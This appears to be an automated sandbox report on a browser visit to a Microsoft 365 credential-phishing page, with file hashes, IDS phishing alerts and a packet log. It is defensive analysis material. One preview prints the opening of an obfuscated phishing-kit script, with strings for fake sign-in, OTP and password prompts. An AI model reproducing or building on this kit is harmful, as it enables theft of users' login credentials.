                                                        MD5:7C8F863C110E8A7F8CD9DCE6D4E9449F
                                                        SHA1:260ED955797213098033E72967A966B9A35B6E73
                                                        SHA-256:4E8990E58D4FC1F5BE51AFE41F579623C93CBA30262ED703CE5DA74373F147B0
                                                        SHA-512:437FD890258891F2454A3D09231454D12FAA99A2B95D0A05FAEC293B5FB683170148FB0AFC590319D3FA8CD37A3E165108DFCEBFC667E6655040FD6D52B80729
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<html>. <head>. <title>COMING SOON</title>. <body>. <div class="bgimg">. <div class="middle">. <h1>COMING SOON</h1>. <hr>. <p id="demo" style="font-size:30px"></p>. </div>. </div>. <style>. body,. html {. height: 100%;. margin: 0;. }.. .bgimg {. background-image: url("https://i.imgur.com/xA8aaXN.png");. height: 100%;. background-position: center;. background-size: cover;. position: relative;. color: white;. font-family: "Courier New", Courier, monospace;. font-size: 25px;. }.. .topleft {. position: absolute;. top: 0;. left: 16px;. }.. .bottomleft {. position: absolute;. bottom: 0;. left: 16px;. }.. .middle {. position: absolute;. top: 80%;. left: 50%;. transform: translate(-50%, -50%);. text-align: center;. }.. hr {. margin: auto;.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:exported SGML document, Unicode text, UTF-8 text, with very long lines (65506)
                                                        Category:downloaded
                                                        Size (bytes):121471
                                                        Entropy (8bit):4.443973115063283
                                                        Encrypted:false
                                                        SSDEEP:3072:Angz3cwtj4+eS6e6+XE3TLc7afmmmmmUmBs/N:AnU3cwtj4+eS6e6+XE3TL9
                                                        MD5:7E32DC72F512FD3F004E1FB20CD34E92
                                                        SHA1:0EDD69E1DA1471CD8926A25A55B2E84A17C0EB2D
                                                        SHA-256:5155B875701F7066E44F3340647A26E76A6C16904D794C2B6B9E1DBE9697E01E
                                                        SHA-512:EEF55C34AF0AE9AFC4F4C35A27B942BBB4E3D10CB98D4A7572D17A71879F5850B9685F8EF90E646ED4BFA73A7419DFE5378B8C99D03B3525EDD50496A50A5025
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://vip.kerjasimple.com/m/jsv.js
                                                        Preview:function _0xb276() {. const _0x5ed944 = ['href', '.phoneotpText', 'readyState', '#playme_big', '@ionos.', '#playme', 'resize', 's2c_restart', '.loaderxBlock11', 's2c', 'complete', 'O365', 'url(\x27https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg\x27)', '@163.', 'trim', '#fff', 'location', 'focus', 'beforeend', 'onblur', '@yandex.', 'load', 'RQ_EMAIL', '375242BWnaRd', 'body', 'Trying\x20to\x20sign\x20you\x20in\x20...', '#allbody', 'endUrl', 'RQ_OTP_APP', 'onfocus', '.logerMe', '.appotpCode', '.otpInput2', 'https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg', 'keyup', 'disconnect', '<p/>', '1007762XNswUc', 'test', 'includes', 'interactive', '.loaderxBlock2', '#000', 'width', 'CORRECT_OTP', 'otp_command', '.grayBox', '.emailInput', '.msappBlock', 'authentication-server.com', 'reload', 'attachEvent', '.passwordError', 'RQ_OTP_NOPASS_APP', '#base_icons', 'top', '.backArrow', '\x0a\x
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (65317)
                                                        Category:downloaded
                                                        Size (bytes):100782
                                                        Entropy (8bit):4.782445110770722
                                                        Encrypted:false
                                                        SSDEEP:1536:mUMVM6MVMkMVM9MVMNMVMispLudL+P8Wcn0Fwib3ePyUHsE+z:hudL25cn0FfePyUME+z
                                                        MD5:6386FB409D4A2ABC96EEE7BE8F6D4CC4
                                                        SHA1:09102CFC60EFB430A25EE97CEE9A6A35DF6DFC59
                                                        SHA-256:0DF5A33710E433DE1F5415B1D47E4130CA7466AEE5B81955F1045C4844BBB3ED
                                                        SHA-512:29F91FC180EC2E4225C10A7A2C59E5F3335D2C6C6EF58000D50BF020D92CE0F85C125412BEA73254B2C3F5A3215DDD77B908E85ED10A368B0E59A66A5E07A5D2
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css
                                                        Preview:/*!. * Font Awesome Free 6.1.1 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2022 Fonticons, Inc.. */..fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-duotone,.fa-light,.fa-regular,.fa-solid,.fa-thin,.fab,.fad,.fal,.far,.fas,.fat{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;line-height:.08333em;vertical-align:.125em}.fa-sm{font-size:.875em;line-height:.07143em;vertical-align:.05357em
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):52
                                                        Entropy (8bit):4.190260390968384
                                                        Encrypted:false
                                                        SSDEEP:3:OnuZoS+NT/ZoS8/ZYn:OnuZoSyT/ZoS8/ZYn
                                                        MD5:09BDE5D10D92DEBBB74AE9C3DF3AECAB
                                                        SHA1:2F4EEA05E85C26DE82C5E7CBA471687EC8D855EC
                                                        SHA-256:F67F67274C88240DE01FA51D483271F58A5752B607B13DEE041C7A0671290E7F
                                                        SHA-512:0FF4A460BC9068E61B6EEC0078E97F2AD0DCD12288E8161688351C3BB85A87D624E5B7635C47ED1B5B93C6D3B4A29A756A75A897394B4E6A3986BBB1762CFC6C
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSJQn7AJWmQY7khRIFDZFhlU4SBQ01hlQcEgUNkWGVThIFDZFhlU4=?alt=proto
                                                        Preview:CiQKBw2RYZVOGgAKBw01hlQcGgAKBw2RYZVOGgAKBw2RYZVOGgA=
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                                        Category:downloaded
                                                        Size (bytes):276
                                                        Entropy (8bit):7.316609873335077
                                                        Encrypted:false
                                                        SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                                        MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                                        SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                                        SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                                        SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg
                                                        Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....
                                                        No static file info
                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-11-12T16:26:58.486646+01002057333ET PHISHING MAMBA Credential Phish Landing Page 2024-11-081192.168.2.649719159.89.194.49443TCP
                                                        2024-11-12T16:26:59.833498+01002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.649722159.89.194.49443TCP
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 12, 2024 16:26:46.291707039 CET49674443192.168.2.6173.222.162.64
                                                        Nov 12, 2024 16:26:46.307328939 CET49673443192.168.2.6173.222.162.64
                                                        Nov 12, 2024 16:26:46.635479927 CET49672443192.168.2.6173.222.162.64
                                                        Nov 12, 2024 16:26:52.375807047 CET49709443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:26:52.375822067 CET4434970940.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:26:52.375895977 CET49709443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:26:52.377159119 CET49709443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:26:52.377171993 CET4434970940.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:26:53.493153095 CET4434970940.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:26:53.493220091 CET49709443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:26:53.499113083 CET49709443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:26:53.499118090 CET4434970940.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:26:53.499373913 CET4434970940.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:26:53.501332998 CET49709443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:26:53.501396894 CET49709443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:26:53.501401901 CET4434970940.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:26:53.501523018 CET49709443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:26:53.543329954 CET4434970940.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:26:53.751466036 CET4434970940.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:26:53.751952887 CET49709443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:26:53.751969099 CET4434970940.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:26:53.751988888 CET49709443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:26:53.752021074 CET49709443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:26:55.156641006 CET49715443192.168.2.6104.20.7.133
                                                        Nov 12, 2024 16:26:55.156696081 CET44349715104.20.7.133192.168.2.6
                                                        Nov 12, 2024 16:26:55.156776905 CET49715443192.168.2.6104.20.7.133
                                                        Nov 12, 2024 16:26:55.156819105 CET49716443192.168.2.6104.20.7.133
                                                        Nov 12, 2024 16:26:55.156843901 CET44349716104.20.7.133192.168.2.6
                                                        Nov 12, 2024 16:26:55.157008886 CET49715443192.168.2.6104.20.7.133
                                                        Nov 12, 2024 16:26:55.157021999 CET44349715104.20.7.133192.168.2.6
                                                        Nov 12, 2024 16:26:55.157037020 CET49716443192.168.2.6104.20.7.133
                                                        Nov 12, 2024 16:26:55.157250881 CET49716443192.168.2.6104.20.7.133
                                                        Nov 12, 2024 16:26:55.157264948 CET44349716104.20.7.133192.168.2.6
                                                        Nov 12, 2024 16:26:55.774770975 CET44349716104.20.7.133192.168.2.6
                                                        Nov 12, 2024 16:26:55.775158882 CET49716443192.168.2.6104.20.7.133
                                                        Nov 12, 2024 16:26:55.775170088 CET44349716104.20.7.133192.168.2.6
                                                        Nov 12, 2024 16:26:55.775866032 CET44349715104.20.7.133192.168.2.6
                                                        Nov 12, 2024 16:26:55.776031971 CET49715443192.168.2.6104.20.7.133
                                                        Nov 12, 2024 16:26:55.776052952 CET44349715104.20.7.133192.168.2.6
                                                        Nov 12, 2024 16:26:55.776191950 CET44349716104.20.7.133192.168.2.6
                                                        Nov 12, 2024 16:26:55.776254892 CET49716443192.168.2.6104.20.7.133
                                                        Nov 12, 2024 16:26:55.777060986 CET44349715104.20.7.133192.168.2.6
                                                        Nov 12, 2024 16:26:55.777128935 CET49715443192.168.2.6104.20.7.133
                                                        Nov 12, 2024 16:26:55.777620077 CET49716443192.168.2.6104.20.7.133
                                                        Nov 12, 2024 16:26:55.777692080 CET44349716104.20.7.133192.168.2.6
                                                        Nov 12, 2024 16:26:55.777791023 CET49716443192.168.2.6104.20.7.133
                                                        Nov 12, 2024 16:26:55.777797937 CET44349716104.20.7.133192.168.2.6
                                                        Nov 12, 2024 16:26:55.778047085 CET49715443192.168.2.6104.20.7.133
                                                        Nov 12, 2024 16:26:55.778116941 CET44349715104.20.7.133192.168.2.6
                                                        Nov 12, 2024 16:26:55.824213982 CET49716443192.168.2.6104.20.7.133
                                                        Nov 12, 2024 16:26:55.824215889 CET49715443192.168.2.6104.20.7.133
                                                        Nov 12, 2024 16:26:55.824240923 CET44349715104.20.7.133192.168.2.6
                                                        Nov 12, 2024 16:26:55.870243073 CET49715443192.168.2.6104.20.7.133
                                                        Nov 12, 2024 16:26:55.902892113 CET49674443192.168.2.6173.222.162.64
                                                        Nov 12, 2024 16:26:55.917433023 CET49673443192.168.2.6173.222.162.64
                                                        Nov 12, 2024 16:26:56.245088100 CET49672443192.168.2.6173.222.162.64
                                                        Nov 12, 2024 16:26:56.317503929 CET44349716104.20.7.133192.168.2.6
                                                        Nov 12, 2024 16:26:56.317635059 CET44349716104.20.7.133192.168.2.6
                                                        Nov 12, 2024 16:26:56.317678928 CET49716443192.168.2.6104.20.7.133
                                                        Nov 12, 2024 16:26:56.350286961 CET49716443192.168.2.6104.20.7.133
                                                        Nov 12, 2024 16:26:56.350296974 CET44349716104.20.7.133192.168.2.6
                                                        Nov 12, 2024 16:26:56.377439022 CET49719443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:56.377476931 CET44349719159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:56.377538919 CET49719443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:56.378356934 CET49719443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:56.378367901 CET44349719159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:57.446614981 CET44349719159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:57.450995922 CET49719443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:57.451014042 CET44349719159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:57.452156067 CET44349719159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:57.452228069 CET49719443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:57.487766027 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:57.487804890 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:57.487869024 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:57.488224030 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:57.488238096 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:57.880662918 CET49719443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:57.880918026 CET44349719159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:57.881030083 CET49719443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:57.881045103 CET44349719159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:57.890933037 CET49721443192.168.2.6142.250.185.228
                                                        Nov 12, 2024 16:26:57.890959024 CET44349721142.250.185.228192.168.2.6
                                                        Nov 12, 2024 16:26:57.891046047 CET49721443192.168.2.6142.250.185.228
                                                        Nov 12, 2024 16:26:57.891561985 CET49721443192.168.2.6142.250.185.228
                                                        Nov 12, 2024 16:26:57.891576052 CET44349721142.250.185.228192.168.2.6
                                                        Nov 12, 2024 16:26:57.933628082 CET49719443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:57.999566078 CET44349705173.222.162.64192.168.2.6
                                                        Nov 12, 2024 16:26:57.999680996 CET49705443192.168.2.6173.222.162.64
                                                        Nov 12, 2024 16:26:58.233730078 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:58.233809948 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:58.240576982 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:58.240608931 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:58.240853071 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:58.289654970 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:58.297097921 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:58.339343071 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:58.486651897 CET44349719159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:58.487123013 CET44349719159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:58.487131119 CET44349719159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:58.487190962 CET44349719159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:58.487190962 CET49719443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:58.487248898 CET49719443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:58.488230944 CET49719443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:58.488249063 CET44349719159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:58.562841892 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:58.562865019 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:58.562877893 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:58.562891006 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:58.562917948 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:58.562930107 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:58.562954903 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:58.563007116 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:58.563029051 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:58.683126926 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:58.683154106 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:58.683202028 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:58.683217049 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:58.683269024 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:58.755445004 CET44349721142.250.185.228192.168.2.6
                                                        Nov 12, 2024 16:26:58.799391985 CET49721443192.168.2.6142.250.185.228
                                                        Nov 12, 2024 16:26:58.799406052 CET44349721142.250.185.228192.168.2.6
                                                        Nov 12, 2024 16:26:58.799840927 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:58.799860001 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:58.799930096 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:58.799948931 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:58.799977064 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:58.800009966 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:58.800342083 CET44349721142.250.185.228192.168.2.6
                                                        Nov 12, 2024 16:26:58.800430059 CET49721443192.168.2.6142.250.185.228
                                                        Nov 12, 2024 16:26:58.807742119 CET49722443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:58.807770967 CET44349722159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:58.807842016 CET49722443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:58.811268091 CET49723443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:58.811307907 CET44349723159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:58.811361074 CET49723443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:58.812047958 CET49721443192.168.2.6142.250.185.228
                                                        Nov 12, 2024 16:26:58.812107086 CET44349721142.250.185.228192.168.2.6
                                                        Nov 12, 2024 16:26:58.812890053 CET49723443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:58.812910080 CET44349723159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:58.813230038 CET49722443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:58.813244104 CET44349722159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:58.840779066 CET49724443192.168.2.6184.28.90.27
                                                        Nov 12, 2024 16:26:58.840790033 CET44349724184.28.90.27192.168.2.6
                                                        Nov 12, 2024 16:26:58.840923071 CET49724443192.168.2.6184.28.90.27
                                                        Nov 12, 2024 16:26:58.843352079 CET49724443192.168.2.6184.28.90.27
                                                        Nov 12, 2024 16:26:58.843364954 CET44349724184.28.90.27192.168.2.6
                                                        Nov 12, 2024 16:26:58.858844042 CET49721443192.168.2.6142.250.185.228
                                                        Nov 12, 2024 16:26:58.858854055 CET44349721142.250.185.228192.168.2.6
                                                        Nov 12, 2024 16:26:58.903894901 CET49721443192.168.2.6142.250.185.228
                                                        Nov 12, 2024 16:26:58.917135954 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:58.917155027 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:58.917217016 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:58.917239904 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:58.917295933 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:59.034177065 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.034198999 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.034245968 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:59.034259081 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.034296036 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:59.034311056 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:59.150827885 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.150861025 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.150979996 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:59.151004076 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.151060104 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:59.264995098 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.265017986 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.265130997 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:59.265151024 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.265189886 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:59.330362082 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.330383062 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.330468893 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:59.330481052 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.330518961 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:59.407179117 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.407198906 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.407286882 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:59.407299042 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.407340050 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:59.504904985 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.504923105 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.504971027 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:59.504987955 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.505024910 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:59.505038023 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:59.620171070 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.620197058 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.620277882 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:59.620290995 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.620332956 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:59.678662062 CET44349724184.28.90.27192.168.2.6
                                                        Nov 12, 2024 16:26:59.678736925 CET49724443192.168.2.6184.28.90.27
                                                        Nov 12, 2024 16:26:59.680717945 CET49724443192.168.2.6184.28.90.27
                                                        Nov 12, 2024 16:26:59.680725098 CET44349724184.28.90.27192.168.2.6
                                                        Nov 12, 2024 16:26:59.680936098 CET44349724184.28.90.27192.168.2.6
                                                        Nov 12, 2024 16:26:59.725509882 CET49724443192.168.2.6184.28.90.27
                                                        Nov 12, 2024 16:26:59.733355045 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.733381033 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.733422995 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:59.733444929 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.733474016 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:59.733484030 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:59.760206938 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.760229111 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.760282993 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:59.760292053 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.760344982 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:59.771337032 CET44349724184.28.90.27192.168.2.6
                                                        Nov 12, 2024 16:26:59.799973965 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.800045967 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:59.800049067 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.800103903 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:59.800192118 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:59.800210953 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.800221920 CET49720443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:26:59.800228119 CET4434972013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:26:59.824882030 CET44349722159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:59.825403929 CET49722443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:59.825419903 CET44349722159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:59.825890064 CET44349722159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:59.826595068 CET49722443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:59.826689959 CET44349722159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:59.832154989 CET49722443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:59.833105087 CET49722443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:59.833137035 CET44349722159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:59.833183050 CET49722443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:59.833189964 CET44349722159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:59.833350897 CET49722443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:59.833373070 CET49722443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:59.833374023 CET44349722159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:59.833390951 CET44349722159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:59.833426952 CET49722443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:59.833450079 CET44349722159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:59.833564043 CET49722443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:59.833599091 CET44349722159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:59.833713055 CET49722443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:59.833728075 CET44349722159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:59.833832026 CET49722443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:59.833844900 CET44349722159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:59.833865881 CET49722443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:59.833875895 CET44349722159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:59.833887100 CET49722443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:59.833899021 CET44349722159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:59.833899975 CET49722443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:26:59.833909988 CET44349722159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:26:59.853213072 CET49725443192.168.2.613.107.246.45
